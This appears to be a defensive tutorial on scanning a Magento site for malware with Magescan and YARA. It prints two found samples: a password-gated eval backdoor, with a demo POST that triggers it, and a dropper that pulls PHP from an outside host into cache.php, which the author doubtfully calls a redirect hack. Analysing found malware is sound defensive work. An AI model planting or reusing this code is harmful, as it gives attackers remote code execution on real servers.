
Finding Malicious Code on Magento

The first thing to do is check your site from an outside perspective, the way any attacker would.

The Frontend scan

Use Magescan: ./magescan scan:all <site>

This scan will usually tell you which Magento security patches have not been applied. The first thing to do is apply them immediately.

Next, check under Installed Modules whether any known-vulnerable extensions are present. A classic problem extension is:

+------------------------+-----------+
| Module                 | Installed |
+------------------------+-----------+
| VladimirPopov_WebForms | Yes       |
+------------------------+-----------+

This extension allows users to upload anything they want onto your server, including files with the .php extension.

So get rid of it as soon as you can.

A server side scan

Now it is time to scan for vulnerabilities and remote-execution backdoors that are already part of your Magento site.

The best tool for this is a Magento malware collection of YARA rules.

The command to run is: yara -r rules/all-confirmed.yar /path/to/directory

It checks files against known MD5 hashes and for eval expressions; a hit looks like this:

eval_post My-site/magento/media/dhl/info.php
md5_c647e85ad77fd9971ba709a08566935d My-site/magento/media/wysiwyg/12345.php

The contents of info.php are:

$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
    if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
    exit;
}
if(isset($_GET['sesion'])){
    phpinfo();
}

The contents of 12345.php are:

$cmd1 = file_get_contents("http://seotramp.com/wp-content/plugins/youtuber/cache.txt");
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);

I am not too sure about the second one, as that is more of a redirect hack that sends you, and maybe your users, to a "Be Rich now if you use the Binary Options System" page.

The first one is remote code execution: the attacker base64-encodes their PHP and sends it along with a password whose MD5 must match the hard-coded hash. I think they add all of these extra things just to confuse developers into thinking there is nothing going on here.

So to try it out we can make a POST to media/dhl/info.php

With

$_POST['ue'] = ZWNobyAnaGVsbG8gd29ybGQnOw==

and

$_POST['hash'] = helloworld (md5('helloworld') is fc5e038d38a57032085441e7fe7010b0, the hard-coded $hash)

ZWNobyAnaGVsbG8gd29ybGQnOw== base64-decoded is echo 'hello world';

So that is remote code execution.